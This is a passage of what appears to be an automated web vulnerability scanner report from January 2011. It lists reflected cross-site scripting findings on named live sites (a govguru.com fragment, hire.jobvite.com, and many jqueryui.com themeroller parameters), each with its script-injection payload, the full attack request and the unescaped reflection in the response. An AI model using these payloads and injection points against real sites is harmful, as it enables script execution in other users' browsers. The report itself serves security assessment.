Host: govguru.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.6
Vary: Accept-Encoding
Cache-Control: max-age=18000
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Jan 2011 19:41:53 GMT
Keep-Alive: timeout=5, max=64
Expires: Fri, 28 Jan 2011 00:41:53 GMT
Connection: close
Set-Cookie: symfony=9r2r7aqn70j46rbc3dsh950qp0; path=/
Set-Cookie: loc-1=%2Fnorth-carolina; path=/
Set-Cookie: siteHost=http://govguru.com; path=/; domain=.govguru.com
X-Powered-By: PHP/5.2.6
Content-Length: 93590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Con
...[SNIP]...
<a href="/boat-registration?89d43"><script>alert(1)</script>e70e52d1510=1" title="U.S. Boat Registration">
...[SNIP]...

3.11. http://hire.jobvite.com/CompanyJobs/Careers.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hire.jobvite.com
Path:	/CompanyJobs/Careers.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7246e</script><script>alert(1)</script>0b363216a36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh&7246e</script><script>alert(1)</script>0b363216a36=1 HTTP/1.1
Host: hire.jobvite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=nc5bqb45d2gjpv2j3d3qgwfc; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: guestidc=8e125cb6-e875-4356-a3f3-ea1fa0da79e7; expires=Sat, 26-Feb-2011 19:13:22 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 27 Jan 2011 19:13:22 GMT
Connection: close
Content-Length: 46859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<link href="http://hire.jo
...[SNIP]...
<!--
jvurlargs = '?c=qXY9VfwJ&7246e</script><script>alert(1)</script>0b363216a36=1&cs=93q9Vfwh&su=fsY9Vfwe';
jvurlargsclean = '?c=qXY9VfwJ&7246e</script>
...[SNIP]...

3.12. http://jqueryui.com/themeroller/ [bgColorActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fc42"><script>alert(1)</script>7b6e381a9c0 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F88fc42"><script>alert(1)</script>7b6e381a9c0&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F88fc42"><script>alert(1)</script>7b6e381a9c0&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHi
...[SNIP]...

3.13. http://jqueryui.com/themeroller/ [bgColorContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dc45"><script>alert(1)</script>f43f5c2ec6a was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF5dc45"><script>alert(1)</script>f43f5c2ec6a&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ld&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF5dc45"><script>alert(1)</script>f43f5c2ec6a&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault
...[SNIP]...

3.14. http://jqueryui.com/themeroller/ [bgColorDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ce41"><script>alert(1)</script>392cbdd1c3d was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF9ce41"><script>alert(1)</script>392cbdd1c3d&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF9ce41"><script>alert(1)</script>392cbdd1c3d&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHo
...[SNIP]...

3.15. http://jqueryui.com/themeroller/ [bgColorError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 911ae"><script>alert(1)</script>e29864d36d2 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF911ae"><script>alert(1)</script>e29864d36d2&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF911ae"><script>alert(1)</script>e29864d36d2&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35
...[SNIP]...

3.16. http://jqueryui.com/themeroller/ [bgColorHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4c61"><script>alert(1)</script>5c7875cd310 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDDc4c61"><script>alert(1)</script>5c7875cd310&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
eroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDDc4c61"><script>alert(1)</script>5c7875cd310&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&b
...[SNIP]...

3.17. http://jqueryui.com/themeroller/ [bgColorHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 473b0"><script>alert(1)</script>d66d5d90bc9 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C473b0"><script>alert(1)</script>d66d5d90bc9&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C473b0"><script>alert(1)</script>d66d5d90bc9&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityEr
...[SNIP]...

3.18. http://jqueryui.com/themeroller/ [bgColorHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e76d"><script>alert(1)</script>50ee2f3037a was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF3e76d"><script>alert(1)</script>50ee2f3037a&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF3e76d"><script>alert(1)</script>50ee2f3037a&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&bor
...[SNIP]...

3.19. http://jqueryui.com/themeroller/ [bgColorOverlay parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f2b5"><script>alert(1)</script>576b6389ccd was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=0000008f2b5"><script>alert(1)</script>576b6389ccd&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
